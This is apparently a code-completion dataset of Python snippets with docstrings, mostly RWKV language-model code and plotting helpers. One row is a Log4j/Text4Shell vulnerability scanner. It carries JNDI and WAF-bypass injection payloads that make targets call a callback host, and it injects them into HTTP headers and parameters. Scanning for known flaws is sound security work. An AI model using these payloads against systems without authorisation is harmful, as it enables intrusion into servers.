id int64 0 190k | prompt stringlengths 21 13.4M | docstring stringlengths 1 12k ⌀ |
|---|---|---|
6,108 | import os
import json
import random
import numpy as np
import torch
from torch.nn import functional as F
from torch.utils.data import Dataset
def set_seed(seed):
random.seed(seed)
np.random.seed(seed)
torch.manual_seed(seed)
torch.cuda.manual_seed_all(seed) | null |
6,109 | from lib2to3.pgen2 import token
import os
import torch
import numpy as np
import shutil
import struct
from functools import lru_cache
from itertools import accumulate
The provided code snippet includes necessary dependencies for implementing the `print_rank_0` function. Write a Python function `def print_rank_0(*message)` to solve the following problem:
If distributed is initialized print only on rank 0.
Here is the function:
def print_rank_0(*message):
"""If distributed is initialized print only on rank 0."""
if torch.distributed.is_initialized():
if torch.distributed.get_rank() == 0:
print(*message, flush=True)
else:
print(*message, flush=True) | If distributed is initialized print only on rank 0. |
6,114 | import types
import copy
import torch
import math, os
from torch.nn import functional as F
import torch.nn as nn
if os.environ['RWKV_RUN_DEVICE'] == 'cuda':
T_MAX = 1024 # increase this if your ctx_len is long [NOTE: TAKES LOTS OF VRAM!]
# it's possible to go beyond CUDA limitations if you slice the ctx and pass the hidden state in each slice
from torch.utils.cpp_extension import load
wkv_cuda = load(name="wkv", sources=["cuda/wkv_op.cpp", "cuda/wkv_cuda.cu"],
verbose=True, extra_cuda_cflags=['-res-usage', '--maxrregcount 60', '--use_fast_math', '-O3', '-Xptxas -O3', f'-DTmax={T_MAX}'])
class WKV(torch.autograd.Function):
def forward(ctx, B, T, C, w, u, k, v):
def backward(ctx, gy):
def RUN_CUDA(B, T, C, w, u, k, v):
return WKV.apply(B, T, C, w.cuda(), u.cuda(), k.cuda(), v.cuda()) | null |
6,115 | import math, os
import numpy as np
import logging
import torch
import torch.nn as nn
from torch.nn import functional as F
from torch.utils.cpp_extension import load
class WKV(torch.autograd.Function):
    """Custom autograd op wrapping the compiled `wkv_cuda` kernel (RWKV time-mix).

    Forward computes the WKV recurrence on the GPU for a (B, T, C) batch.
    NOTE(review): relies on module-level `T_MAX` and `wkv_cuda` (compiled via
    torch.utils.cpp_extension.load elsewhere in this file) and on the
    RWKV_FLOAT_MODE environment variable — confirm all are set before use.
    """
    def forward(ctx, B, T, C, w, u, k, v):
        # Stash sizes for backward (they are plain ints, not tensors).
        ctx.B = B
        ctx.T = T
        ctx.C = C
        # The kernel is compiled with a fixed Tmax; longer contexts are unsupported.
        assert T <= T_MAX
        assert B * C % min(C, 1024) == 0
        if '32' in os.environ['RWKV_FLOAT_MODE']:
            # fp32/tf32 path: inputs are already float32.
            # w holds log-decay; the kernel expects -exp(w).
            w = -torch.exp(w.contiguous())
            u = u.contiguous()
            k = k.contiguous()
            v = v.contiguous()
        else:
            # fp16/bf16 path: the kernel runs in float32, so upcast first.
            w = -torch.exp(w.float().contiguous())
            u = u.float().contiguous()
            k = k.float().contiguous()
            v = v.float().contiguous()
        # Save the float32, contiguous versions for backward.
        ctx.save_for_backward(w, u, k, v)
        # Output buffer is written entirely by the kernel (empty, not zeroed).
        y = torch.empty((B, T, C), device='cuda', memory_format=torch.contiguous_format)
        wkv_cuda.forward(B, T, C, w, u, k, v, y)
        # Cast the result back to the caller's working precision.
        if '32' in os.environ['RWKV_FLOAT_MODE']:
            return y
        elif os.environ['RWKV_FLOAT_MODE'] == 'fp16':
            return y.half()
        elif os.environ['RWKV_FLOAT_MODE'] == 'bf16':
            return y.bfloat16()
    def backward(ctx, gy):
        B = ctx.B
        T = ctx.T
        C = ctx.C
        assert T <= T_MAX
        assert B * C % min(C, 1024) == 0
        w, u, k, v = ctx.saved_tensors
        # Gradient buffers; gw/gu are per-sample here and reduced below.
        gw = torch.zeros((B, C), device='cuda').contiguous()
        gu = torch.zeros((B, C), device='cuda').contiguous()
        gk = torch.zeros((B, T, C), device='cuda').contiguous()
        gv = torch.zeros((B, T, C), device='cuda').contiguous()
        if '32' in os.environ['RWKV_FLOAT_MODE']:
            wkv_cuda.backward(B, T, C, w, u, k, v, gy.contiguous(), gw, gu, gk, gv)
        else:
            # Kernel works in float32, so upcast the incoming gradient.
            wkv_cuda.backward(B, T, C, w, u, k, v, gy.float().contiguous(), gw, gu, gk, gv)
        # w and u are shared across the batch: sum their gradients over B.
        gw = torch.sum(gw, dim=0)
        gu = torch.sum(gu, dim=0)
        # One None per non-tensor forward input (B, T, C); cast grads back
        # to the working precision.
        if '32' in os.environ['RWKV_FLOAT_MODE']:
            return (None, None, None, gw, gu, gk, gv)
        elif os.environ['RWKV_FLOAT_MODE'] == 'fp16':
            return (None, None, None, gw.half(), gu.half(), gk.half(), gv.half())
        elif os.environ['RWKV_FLOAT_MODE'] == 'bf16':
            return (None, None, None, gw.bfloat16(), gu.bfloat16(), gk.bfloat16(), gv.bfloat16())
def RUN_CUDA(B, T, C, w, u, k, v):
return WKV.apply(B, T, C, w.cuda(), u.cuda(), k.cuda(), v.cuda()) | null |
6,116 | import math, os
import numpy as np
import logging
import torch
import torch.nn as nn
from torch.nn import functional as F
print(f'\nRWKV_HEAD_QK_DIM {RWKV_HEAD_QK_DIM}\n')
from torch.utils.cpp_extension import load
def RWKV_Init(model, args): # fancy initialization of all lin & emb layer in the model
print("\n[--> first run, init model params (very slow for large models) <--]")
print("[so you shall only do it for 1 single GPU and save the checkpt and load it when using multiple GPU]\n")
for mm in model.modules():
if "RecursiveScriptModule" in str(type(mm)):
if mm.original_name not in ["Linear"]:
continue
ww = None
for name, param in mm.named_parameters():
if name == "weight":
ww = param
else:
m = mm
if not isinstance(m, (nn.Linear, nn.Embedding)):
continue
ww = m.weight
with torch.no_grad():
name = "[unknown weight]"
for name, parameter in model.named_parameters(): # find the name of the weight
if id(ww) == id(parameter):
break
shape = ww.shape
gain = 1.0
scale = 1.0 # extra scale for gain
if isinstance(m, nn.Embedding):
gain = math.sqrt(max(shape[0], shape[1]))
if shape[0] == args.vocab_size and shape[1] == args.n_embd: # token emb?
scale = 1e-4
else:
scale = 0
if isinstance(m, nn.Linear):
if shape[0] > shape[1]:
gain = math.sqrt(shape[0] / shape[1])
if shape[0] == args.vocab_size and shape[1] == args.n_embd: # final projection?
scale = 0.5
if hasattr(m, "scale_init"):
scale = m.scale_init
# print(f"{str(shape[0]).ljust(5)} {str(shape[1]).ljust(5)} {str(scale).ljust(4)} {name}")
gain *= scale
if scale == -999:
nn.init.eye_(ww)
elif gain == 0:
# zero init is great for some RWKV matrices
nn.init.zeros_(ww)
elif gain > 0:
nn.init.orthogonal_(ww, gain=gain)
else:
nn.init.normal_(ww, mean=0.0, std=-scale) | null |
6,117 | import random
import numpy as np
import torch
import torch.nn as nn
from torch.nn import functional as F
def top_k_logits(logits, k):
    """Mask all but the k largest logits in each row to -inf.

    Returns a new tensor; the input is left untouched.
    """
    topk_vals, _ = torch.topk(logits, k)
    masked = logits.clone()
    # The smallest of the top-k values is the per-row cutoff.
    cutoff = topk_vals[:, [-1]]
    masked[masked < cutoff] = -float('Inf')
    return masked
def top_p_probs(probs, p):
    """Nucleus (top-p) filtering: zero out the probability tail beyond mass p.

    Expects a 1-D probability tensor; returns a new (unnormalized) tensor.
    """
    kept = probs.clone()
    sorted_probs, sorted_idx = torch.sort(kept, descending=True)
    cumulative = torch.cumsum(sorted_probs, dim=-1)
    remove_mask = cumulative > p
    # Shift right by one so the first token crossing the threshold survives.
    remove_mask[..., 1:] = remove_mask[..., :-1].clone()
    remove_mask[..., 0] = 0
    kept[sorted_idx[remove_mask]] = 0
    return kept
def sample_logits(logits, pos, temperature=1.0, top_k=None, top_p=None, min_p_pow=None, min_p_ratio=None):
logits = logits[:, pos, :] / temperature
probs = F.softmax(logits, dim=-1)
if min_p_ratio is not None:
limit = torch.pow(torch.max(probs), min_p_pow) * min_p_ratio
logits[probs < limit] = -float('Inf')
if top_k is not None:
logits = top_k_logits(logits, top_k)
probs = F.softmax(logits, dim=-1)
if top_p is not None:
probs[0] = top_p_probs(probs[0], top_p)
ix = torch.multinomial(probs, num_samples=1)
return ix[0][0].cpu() | null |
6,118 | import random
import numpy as np
import torch
import torch.nn as nn
from torch.nn import functional as F
def set_seed(seed):
random.seed(seed)
np.random.seed(seed)
torch.manual_seed(seed)
torch.cuda.manual_seed_all(seed) | null |
6,119 | import math
import logging
import torch
import torch.nn as nn
from torch.nn import functional as F
def RWKV_Init(module, config): # fancy initialization of all lin & emb layer in the module
for m in module.modules():
if not isinstance(m, (nn.Linear, nn.Embedding)):
continue
with torch.no_grad():
name = '[unknown weight]'
for name, parameter in module.named_parameters(): # find the name of the weight
if id(m.weight) == id(parameter):
break
shape = m.weight.data.shape
gain = 1.0 # positive: gain for orthogonal, negative: std for normal
scale = 1.0 # extra scale for gain
if isinstance(m, nn.Linear):
if m.bias is not None:
m.bias.data.zero_()
if shape[0] > shape[1]:
gain = math.sqrt(shape[0] / shape[1])
if shape[0] == config.vocab_size and shape[1] == config.n_embd: # final projection?
scale = config.rwkv_emb_scale
if isinstance(m, nn.Embedding):
gain = math.sqrt(max(shape[0], shape[1]))
if shape[0] == config.vocab_size and shape[1] == config.n_embd: # token emb?
scale = config.rwkv_emb_scale
if hasattr(m, 'scale_init'):
scale = m.scale_init
print(str(shape[0]).ljust(5), str(shape[1]).ljust(5), f'{round(scale,2):g}'.ljust(4), name)
gain *= scale
if gain == 0:
nn.init.zeros_(m.weight) # zero init is great for some RWKV matrices
elif gain > 0:
nn.init.orthogonal_(m.weight, gain=gain)
else:
nn.init.normal_(m.weight, mean=0, std=-gain) | null |
6,120 | import math
import logging
import torch
import torch.nn as nn
from torch.nn import functional as F
def rotate_half(x):
    """Rotate the two halves of the last dimension: (a, b) -> (-b, a).

    Standard helper for rotary position embeddings.
    """
    half = x.shape[-1] // 2
    first, second = x[..., :half], x[..., half:]
    return torch.cat((-second, first), dim=-1)
def apply_rotary_pos_emb(q, k, cos, sin):
cos, sin = cos[...,:q.shape[-2],:], sin[...,:q.shape[-2],:]
return (q * cos) + (rotate_half(q) * sin), (k * cos) + (rotate_half(k) * sin) | null |
6,122 | import json, time, random, os
import numpy as np
import torch
from torch.nn import functional as F
def FermatPrimalityTest(number):
def MillerRabinPrimalityTest(number):
def MaybeIsPrime(number):
if FermatPrimalityTest(number) and MillerRabinPrimalityTest(number):
return True
else:
return False | null |
6,131 | import os, math, gc, importlib
import torch
import torch.nn as nn
from torch.nn import functional as F
import pytorch_lightning as pl
from pytorch_lightning.utilities import rank_zero_info, rank_zero_only
from pytorch_lightning.strategies import DeepSpeedStrategy
from torch.utils.cpp_extension import load
if 'x060' in os.environ["RWKV_MY_TESTING"]:
wkv6_cuda = load(name="wkv6", sources=["cuda/wkv6_op.cpp", f"cuda/wkv6_cuda.cu"],
verbose=True, extra_cuda_cflags=["-res-usage", "--use_fast_math", "-O3", "-Xptxas -O3", "--extra-device-vectorization", f"-D_N_={HEAD_SIZE}", f"-D_T_={int(os.environ['RWKV_CTXLEN'])}"])
class WKV_6(torch.autograd.Function):
    """Custom autograd op wrapping the compiled `wkv6_cuda` kernel (RWKV v6 time-mix).

    All tensor inputs must be contiguous bfloat16; r/k/v/w are (B, T, C).
    NOTE(review): relies on module-level `HEAD_SIZE` and `wkv6_cuda`
    (compiled just above) — confirm both are in scope.
    """
    def forward(ctx, B, T, C, H, r, k, v, w, u):
        with torch.no_grad():
            # The kernel is compiled for bfloat16 only.
            assert r.dtype == torch.bfloat16
            assert k.dtype == torch.bfloat16
            assert v.dtype == torch.bfloat16
            assert w.dtype == torch.bfloat16
            assert u.dtype == torch.bfloat16
            assert HEAD_SIZE == C // H
            # Stash sizes for backward (plain ints, not tensors).
            ctx.B = B
            ctx.T = T
            ctx.C = C
            ctx.H = H
            assert r.is_contiguous()
            assert k.is_contiguous()
            assert v.is_contiguous()
            assert w.is_contiguous()
            assert u.is_contiguous()
            # w holds log-decay; the kernel expects -exp(w) in float32.
            ew = (-torch.exp(w.float())).contiguous()
            ctx.save_for_backward(r, k, v, ew, u)
            # Output buffer is written entirely by the kernel (empty, not zeroed).
            y = torch.empty((B, T, C), device=r.device, dtype=torch.bfloat16, memory_format=torch.contiguous_format)#.uniform_(-100, 100)
            wkv6_cuda.forward(B, T, C, H, r, k, v, ew, u, y)
            return y
    def backward(ctx, gy):
        with torch.no_grad():
            assert gy.dtype == torch.bfloat16
            B = ctx.B
            T = ctx.T
            C = ctx.C
            H = ctx.H
            assert gy.is_contiguous()
            r, k, v, ew, u = ctx.saved_tensors
            # Gradient buffers are filled entirely by the kernel (empty, not zeroed).
            gr = torch.empty((B, T, C), device=gy.device, requires_grad=False, dtype=torch.bfloat16, memory_format=torch.contiguous_format)#.uniform_(-100, 100)
            gk = torch.empty((B, T, C), device=gy.device, requires_grad=False, dtype=torch.bfloat16, memory_format=torch.contiguous_format)#.uniform_(-100, 100)
            gv = torch.empty((B, T, C), device=gy.device, requires_grad=False, dtype=torch.bfloat16, memory_format=torch.contiguous_format)#.uniform_(-100, 100)
            gw = torch.empty((B, T, C), device=gy.device, requires_grad=False, dtype=torch.bfloat16, memory_format=torch.contiguous_format)#.uniform_(-100, 100)
            gu = torch.empty((B, C), device=gy.device, requires_grad=False, dtype=torch.bfloat16, memory_format=torch.contiguous_format)#.uniform_(-100, 100)
            wkv6_cuda.backward(B, T, C, H, r, k, v, ew, u, gy, gr, gk, gv, gw, gu)
            # u is shared across the batch: sum its gradient over B, per head.
            gu = torch.sum(gu, 0).view(H, C//H)
            # One None per non-tensor forward input (B, T, C, H).
            return (None, None, None, None, gr, gk, gv, gw, gu)
else:
wkv5_cuda = load(name="wkv5", sources=["cuda/wkv5_op.cpp", f"cuda/wkv5_cuda.cu"],
verbose=True, extra_cuda_cflags=["-res-usage", "--use_fast_math", "-O3", "-Xptxas -O3", "--extra-device-vectorization", f"-D_N_={HEAD_SIZE}"])
def RUN_CUDA_RWKV6(B, T, C, H, r, k, v, w, u):
return WKV_6.apply(B, T, C, H, r, k, v, w, u) | null |
6,132 | import os, math, gc, importlib
import torch
import torch.nn as nn
from torch.nn import functional as F
import pytorch_lightning as pl
from pytorch_lightning.utilities import rank_zero_info, rank_zero_only
from pytorch_lightning.strategies import DeepSpeedStrategy
from torch.utils.cpp_extension import load
if 'x060' in os.environ["RWKV_MY_TESTING"]:
wkv6_cuda = load(name="wkv6", sources=["cuda/wkv6_op.cpp", f"cuda/wkv6_cuda.cu"],
verbose=True, extra_cuda_cflags=["-res-usage", "--use_fast_math", "-O3", "-Xptxas -O3", "--extra-device-vectorization", f"-D_N_={HEAD_SIZE}", f"-D_T_={int(os.environ['RWKV_CTXLEN'])}"])
else:
wkv5_cuda = load(name="wkv5", sources=["cuda/wkv5_op.cpp", f"cuda/wkv5_cuda.cu"],
verbose=True, extra_cuda_cflags=["-res-usage", "--use_fast_math", "-O3", "-Xptxas -O3", "--extra-device-vectorization", f"-D_N_={HEAD_SIZE}"])
class WKV_5(torch.autograd.Function):
def forward(ctx, B, T, C, H, r, k, v, w, u):
def backward(ctx, gy):
def RUN_CUDA_RWKV5(B, T, C, H, r, k, v, w, u):
return WKV_5.apply(B, T, C, H, r, k, v, w, u) | null |
6,133 | import json, math, random, sys, time, shutil, os, string, re, fileinput
import numpy as np
from tokenizer.rwkv_tokenizer import TRIE_TOKENIZER
from src.binidx import MMapIndexedDataset
def index_file_path(prefix_path):
return prefix_path + ".idx" | null |
6,134 | import json, math, random, sys, time, shutil, os, string, re, fileinput
import numpy as np
from tokenizer.rwkv_tokenizer import TRIE_TOKENIZER
from src.binidx import MMapIndexedDataset
def data_file_path(prefix_path):
return prefix_path + ".bin" | null |
6,135 | import json, math, random, sys, time, shutil, os, string, re, fileinput
import numpy as np
from tokenizer.rwkv_tokenizer import TRIE_TOKENIZER
tokenizer = TRIE_TOKENIZER("tokenizer/rwkv_vocab_v20230424.txt")
from src.binidx import MMapIndexedDataset
cnt = 0
print(f"### Convert {IN_FILE} to {OUT_NAME}.bin/idx...")
print(f"### Found {len(non_empty_lines)} non-empty lines in {IN_FILE}")
print("### Building binidx...")
builder = MMapIndexedDatasetBuilder(f"{OUT_NAME}.bin")
builder.finalize((f"{OUT_NAME}.idx"))
print("done")
print("### Verifying result...")
print(f"{'-'*80}\n### Final {OUT_NAME}.bin/idx has {data_size} tokens, {data_len} items. Dtype {data._index.dtype}")
def add_raw(raw):
global builder, cnt
out = tokenizer.encode(raw)
if tokenizer.decode(out) != raw:
print("ERROR" * 100)
exit(0)
out.append(0) # [0] = end_of_doc for rwkv tokenizer
builder.add_item(np.array(out, dtype=np.uint16))
builder.end_document()
if cnt % 500 == 0:
print(cnt, end=" ", flush=True)
cnt += 1 | null |
6,136 | import json, math, random, sys, time, shutil, os, string, re, fileinput
import numpy as np
from tokenizer.rwkv_tokenizer import TRIE_TOKENIZER
from src.binidx import MMapIndexedDataset
for i in range(N_EPOCH):
print(f"Shuffle: {i+1} out of {N_EPOCH}")
random.shuffle(non_empty_lines)
for entry in non_empty_lines:
file.write(entry + "\n")
def is_prime(n):
if n <= 1:
return False
if n <= 3:
return True
if n % 2 == 0 or n % 3 == 0:
return False
i = 5
while i * i <= n:
if n % i == 0 or n % (i + 2) == 0:
return False
i += 6
return True | null |
6,140 | import argparse
import random
import requests
import time
import sys
from urllib import parse as urlparse
import base64
import json
from uuid import uuid4
from base64 import b64encode
from Crypto.Cipher import AES, PKCS1_OAEP
from Crypto.PublicKey import RSA
from Crypto.Hash import SHA256
from termcolor import cprint
try:
import requests.packages.urllib3
requests.packages.urllib3.disable_warnings()
except Exception:
pass
cprint('[•] CVE-2021-44228 - Apache Log4j RCE Scanner', "green")
cprint('[•] Scanner provided by FullHunt.io - The Next-Gen Attack Surface Management Platform.', "yellow")
cprint('[•] Secure your External Attack Surface with FullHunt.io.', "yellow")
timeout = 4
waf_bypass_payloads = ["${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://{{callback_host}}/{{random}}}",
"${${::-j}ndi:rmi://{{callback_host}}/{{random}}}",
"${jndi:rmi://{{callback_host}}/{{random}}}",
"${jndi:rmi://{{callback_host}}}/",
"${${lower:jndi}:${lower:rmi}://{{callback_host}}/{{random}}}",
"${${lower:${lower:jndi}}:${lower:rmi}://{{callback_host}}/{{random}}}",
"${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://{{callback_host}}/{{random}}}",
"${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://{{callback_host}}/{{random}}}",
"${jndi:dns://{{callback_host}}/{{random}}}",
"${jnd${123%25ff:-${123%25ff:-i:}}ldap://{{callback_host}}/{{random}}}",
"${jndi:dns://{{callback_host}}}",
"${j${k8s:k5:-ND}i:ldap://{{callback_host}}/{{random}}}",
"${j${k8s:k5:-ND}i:ldap${sd:k5:-:}//{{callback_host}}/{{random}}}",
"${j${k8s:k5:-ND}i${sd:k5:-:}ldap://{{callback_host}}/{{random}}}",
"${j${k8s:k5:-ND}i${sd:k5:-:}ldap${sd:k5:-:}//{{callback_host}}/{{random}}}",
"${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}ldap://{{callback_host}}/{{random}}}",
"${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}ldap{sd:k5:-:}//{{callback_host}}/{{random}}}",
"${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//{{callback_host}}/{{random}}}",
"${j${k8s:k5:-ND}i${sd:k5:-:}${lower:L}dap${sd:k5:-:}//{{callback_host}}/{{random}}",
"${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}a${::-p}${sd:k5:-:}//{{callback_host}}/{{random}}}",
"${jndi:${lower:l}${lower:d}a${lower:p}://{{callback_host}}}",
"${jnd${upper:i}:ldap://{{callback_host}}/{{random}}}",
"${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://{{callback_host}}/{{random}}}"
]
cve_2021_45046 = [
"${jndi:ldap://127.0.0.1#{{callback_host}}:1389/{{random}}}", # Source: https://twitter.com/marcioalm/status/1471740771581652995,
"${jndi:ldap://127.0.0.1#{{callback_host}}/{{random}}}",
"${jndi:ldap://127.1.1.1#{{callback_host}}/{{random}}}"
]
cve_2022_42889 = [
"${url:UTF-8::https://{{callback_host}}/}",
"${url:UTF-8::https://{{callback_host}}/{{random}}}",
"${url:UTF-8::http://{{callback_host}}/}",
"${url:UTF-8::http://{{callback_host}}/{{random}}}",
"${dns:address|{{callback_host}}}"
]
args = parser.parse_args()
proxies = {}
if args.proxy:
proxies = {"http": args.proxy, "https": args.proxy}
if args.custom_waf_bypass_payload:
waf_bypass_payloads.append(args.custom_waf_bypass_payload)
def get_fuzzing_headers(payload):
    """Build the HTTP header dict used for fuzzing.

    Starts from `default_headers`, then sets every header name listed in
    `args.headers_file` (blank lines and '#' comments skipped) to the payload.
    Honors --exclude-user-agent-fuzzing and prefixes Referer with https://.
    """
    headers = dict(default_headers)
    with open(args.headers_file, "r") as fh:
        for raw_line in fh:
            header_name = raw_line.strip()
            if not header_name or header_name.startswith("#"):
                continue
            headers[header_name] = payload
    if args.exclude_user_agent_fuzzing:
        # Keep the real User-Agent so WAFs don't block on it.
        headers["User-Agent"] = default_headers["User-Agent"]
    if "Referer" in headers:
        headers["Referer"] = f'https://{headers["Referer"]}'
    return headers
def get_fuzzing_post_data(payload):
    """Map every known POST parameter name to the injection payload."""
    return {param: payload for param in post_data_parameters}
def generate_waf_bypass_payloads(callback_host, random_string):
    """Fill every WAF-bypass payload template with the callback host and marker."""
    return [
        template.replace("{{callback_host}}", callback_host)
                .replace("{{random}}", random_string)
        for template in waf_bypass_payloads
    ]
def get_cve_2021_45046_payloads(callback_host, random_string):
    """Instantiate the CVE-2021-45046 payload templates for this target."""
    filled = []
    for template in cve_2021_45046:
        payload = template.replace("{{callback_host}}", callback_host)
        payload = payload.replace("{{random}}", random_string)
        filled.append(payload)
    return filled
def get_cve_2022_42889_payloads(callback_host, random_string):
    """Instantiate the CVE-2022-42889 (Text4Shell) payload templates for this target."""
    return [
        template.replace("{{callback_host}}", callback_host)
                .replace("{{random}}", random_string)
        for template in cve_2022_42889
    ]
def parse_url(url):
    """Parse *url* into its scheme, site, host, and file-path components.

    Returns a dict with keys:
        scheme    -- e.g. "https" (defaults to "http" if the URL has no scheme)
        site      -- scheme + netloc, e.g. "https://example.com:8080"
        host      -- netloc without any port
        file_path -- URL path, "/" if empty

    '#' and spaces are percent-encoded first so they survive parsing and
    later use in requests.
    """
    url = url.replace('#', '%23')
    url = url.replace(' ', '%20')
    # Default to http:// when no scheme is given (e.g. "example.com").
    if ('://' not in url):
        url = str("http://") + str(url)
    # Parse once and reuse (the original parsed the same URL four times).
    parsed = urlparse.urlparse(url)
    file_path = parsed.path or '/'
    return({"scheme": parsed.scheme,
            "site": f"{parsed.scheme}://{parsed.netloc}",
            "host": parsed.netloc.split(":")[0],
            "file_path": file_path})
import requests
try:
import requests.packages.urllib3
requests.packages.urllib3.disable_warnings()
except Exception:
pass
def scan_url(url, callback_host):
parsed_url = parse_url(url)
random_string = ''.join(random.choice('0123456789abcdefghijklmnopqrstuvwxyz') for i in range(7))
payload = '${jndi:ldap://%s.%s/%s}' % (parsed_url["host"], callback_host, random_string)
payloads = [payload]
if args.waf_bypass_payloads:
payloads.extend(generate_waf_bypass_payloads(f'{parsed_url["host"]}.{callback_host}', random_string))
if args.cve_2021_45046:
cprint(f"[•] Scanning for CVE-2021-45046 (Log4j v2.15.0 Patch Bypass - RCE)", "yellow")
payloads.extend(get_cve_2021_45046_payloads(f'{parsed_url["host"]}.{callback_host}', random_string))
if args.cve_2022_42889:
cprint(f"[•] Scanning for CVE-2022-42889 (Apache Commons Text RCE)", "yellow")
payloads.extend(get_cve_2022_42889_payloads(f'{parsed_url["host"]}.{callback_host}', random_string))
for payload in payloads:
cprint(f"[•] URL: {url} | PAYLOAD: {payload}", "cyan")
if args.request_type.upper() == "GET" or args.run_all_tests:
try:
requests.request(url=url,
method="GET",
params={"v": payload},
headers=get_fuzzing_headers(payload),
verify=False,
timeout=timeout,
allow_redirects=(not args.disable_redirects),
proxies=proxies)
except Exception as e:
cprint(f"EXCEPTION: {e}")
if args.request_type.upper() == "POST" or args.run_all_tests:
try:
# Post body
requests.request(url=url,
method="POST",
params={"v": payload},
headers=get_fuzzing_headers(payload),
data=get_fuzzing_post_data(payload),
verify=False,
timeout=timeout,
allow_redirects=(not args.disable_redirects),
proxies=proxies)
except Exception as e:
cprint(f"EXCEPTION: {e}")
try:
# JSON body
requests.request(url=url,
method="POST",
params={"v": payload},
headers=get_fuzzing_headers(payload),
json=get_fuzzing_post_data(payload),
verify=False,
timeout=timeout,
allow_redirects=(not args.disable_redirects),
proxies=proxies)
except Exception as e:
cprint(f"EXCEPTION: {e}") | null |
6,141 | import plotly.graph_objects as go
import numpy as np
from plotly.subplots import make_subplots
import streamlit as st
The provided code snippet includes necessary dependencies for implementing the `bmatrix` function. Write a Python function `def bmatrix(a)` to solve the following problem:
Returns a LaTeX bmatrix :a: numpy array :returns: LaTeX bmatrix as a string
Here is the function:
def bmatrix(a):
"""Returns a LaTeX bmatrix
:a: numpy array
:returns: LaTeX bmatrix as a string
"""
if len(a.shape) > 2:
raise ValueError('bmatrix can at most display two dimensions')
lines = str(a).replace('[', '').replace(']', '').splitlines()
rv = [r'\begin{bmatrix}']
rv += [' ' + ' & '.join(l.split()) + r'\\' for l in lines]
rv += [r'\end{bmatrix}']
return '\n'.join(rv) | Returns a LaTeX bmatrix :a: numpy array :returns: LaTeX bmatrix as a string |
6,143 | import matplotlib.pyplot as plt
import numpy as np
plt.axis('equal')
plt.axis('square')
plt.axhline(y=0, color='k', linewidth = 0.25)
plt.axvline(x=0, color='k', linewidth = 0.25)
plt.xticks(np.arange(-5, 6))
plt.yticks(np.arange(-5, 6))
plt.xlabel('$x_1$')
plt.ylabel('$x_2$')
def plot_shape(X,copy = False):
if copy:
fill_color = np.array([255,236,255])/255
edge_color = np.array([255,0,0])/255
else:
fill_color = np.array([219,238,243])/255
edge_color = np.array([0,153,255])/255
plt.fill(X[:,0], X[:,1],
color = fill_color,
edgecolor = edge_color)
plt.plot(X[:,0], X[:,1],marker = 'x',
markeredgecolor = edge_color*0.5,
linestyle = 'None') | null |
6,144 | import matplotlib.pyplot as plt
import numpy as np
def plot_shape(X,copy = False):
if copy:
fill_color = np.array([255,236,255])/255
edge_color = np.array([255,0,0])/255
else:
fill_color = np.array([219,238,243])/255
edge_color = np.array([0,153,255])/255
plt.fill(X[:,0], X[:,1],
color = fill_color,
edgecolor = edge_color)
plt.plot(X[:,0], X[:,1],marker = 'x',
markeredgecolor = edge_color*0.5,
linestyle = 'None') | null |
6,145 | import streamlit as st
import plotly.graph_objects as go
import sympy
import numpy as np
from scipy.stats import multivariate_normal
rv = multivariate_normal([0, 0],
Sigma)
The provided code snippet includes necessary dependencies for implementing the `bmatrix` function. Write a Python function `def bmatrix(a)` to solve the following problem:
Returns a LaTeX bmatrix :a: numpy array :returns: LaTeX bmatrix as a string
Here is the function:
def bmatrix(a):
"""Returns a LaTeX bmatrix
:a: numpy array
:returns: LaTeX bmatrix as a string
"""
if len(a.shape) > 2:
raise ValueError('bmatrix can at most display two dimensions')
lines = str(a).replace('[', '').replace(']', '').splitlines()
rv = [r'\begin{bmatrix}']
rv += [' ' + ' & '.join(l.split()) + r'\\' for l in lines]
rv += [r'\end{bmatrix}']
return '\n'.join(rv) | Returns a LaTeX bmatrix :a: numpy array :returns: LaTeX bmatrix as a string |
6,146 | import streamlit as st
import plotly.express as px
import seaborn as sns
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
from sklearn.datasets import load_iris
The provided code snippet includes necessary dependencies for implementing the `bmatrix` function. Write a Python function `def bmatrix(a)` to solve the following problem:
Returns a LaTeX bmatrix :a: numpy array :returns: LaTeX bmatrix as a string
Here is the function:
def bmatrix(a):
"""Returns a LaTeX bmatrix
:a: numpy array
:returns: LaTeX bmatrix as a string
"""
if len(a.shape) > 2:
raise ValueError('bmatrix can at most display two dimensions')
lines = str(a).replace('[', '').replace(']', '').splitlines()
rv = [r'\begin{bmatrix}']
rv += [' ' + ' & '.join(l.split()) + r'\\' for l in lines]
rv += [r'\end{bmatrix}']
return '\n'.join(rv) | Returns a LaTeX bmatrix :a: numpy array :returns: LaTeX bmatrix as a string |
6,147 | import seaborn as sns
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
from sklearn.datasets import load_iris
def heatmap(Matrices,Titles,Ranges,Equal_tags):
    """Draw a 1x5 matplotlib figure: three heatmaps separated by '=' and '@' panels.

    Visualizes a matrix identity of the form  M1 = M2 @ M3.

    Args:
        Matrices:   [M1, M2, M3] 2-D arrays to plot.
        Titles:     three panel title strings.
        Ranges:     three (vmin, vmax) pairs, one per heatmap.
        Equal_tags: three bools; True forces a square aspect ratio.

    Side effect: creates a new matplotlib figure (not returned or shown here).
    """
    M1 = Matrices[0]
    M2 = Matrices[1]
    M3 = Matrices[2]
    Title_1 = Titles[0]
    Title_2 = Titles[1]
    Title_3 = Titles[2]
    fig, axs = plt.subplots(1, 5, figsize=(12, 3))
    # Panel 0: left-hand side M1.
    plt.sca(axs[0])
    ax = sns.heatmap(M1,cmap='RdYlBu_r',
    vmin = Ranges[0][0],
    vmax = Ranges[0][1],
    cbar=False,
    xticklabels=False,
    yticklabels=False)
    if Equal_tags[0] == True:
        ax.set_aspect("equal")
    plt.title(Title_1)
    # Panel 1: '=' separator (axis hidden, only the title shows).
    plt.sca(axs[1])
    plt.title('=')
    plt.axis('off')
    # Panel 2: first factor M2.
    plt.sca(axs[2])
    ax = sns.heatmap(M2,cmap='RdYlBu_r',
    vmin = Ranges[1][0],
    vmax = Ranges[1][1],
    cbar=False,
